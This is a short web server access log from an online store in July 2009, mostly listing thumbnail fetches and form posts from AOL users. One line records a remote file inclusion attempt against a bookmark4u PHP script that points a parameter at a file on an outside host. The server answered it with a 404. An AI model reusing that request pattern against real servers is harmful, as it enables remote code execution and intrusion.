64.12.116.137 - - [16/Jul/2009:00:31:52 -0400] "GET /images/items/1010036_THUMB.JPG HTTP/1.1" 200 2458 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C684E3B24C50008D100Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
64.12.116.134 - - [16/Jul/2009:00:31:52 -0400] "GET /images/items/1000034_THUMB.JPG HTTP/1.1" 200 2577 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C684E3B24C50008D100Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
64.12.116.135 - - [16/Jul/2009:00:31:52 -0400] "GET /images/items/1000035_THUMB.JPG HTTP/1.1" 200 2483 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C684E3B24C50008D100Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
121.78.116.209 - - [16/Jul/2009:00:32:00 -0400] "GET /logs/access_log.Q109062300//bookmark4u/bo/include/print_category.php?setup[use_category]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.12.112.102 - - [16/Jul/2009:00:32:17 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L018C684E3B24C50008D100Z+M37+ENG HTTP/1.1" 200 59998 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C674438A4150029D100Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
64.12.116.145 - - [16/Jul/2009:00:32:18 -0400] "GET /images/items/0531037_THUMB.JPG HTTP/1.1" 200 2749 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C684E3B24C50008D100Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
64.12.116.141 - - [16/Jul/2009:00:32:18 -0400] "GET /images/items/0531033_THUMB.JPG HTTP/1.1" 200 2141 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C684E3B24C50008D100Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
64.12.112.102 - - [16/Jul/2009:00:32:39 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L018C684E3B24C50008D100Z+M37+ENG HTTP/1.1" 200 51732 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C674438A4150029D100Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
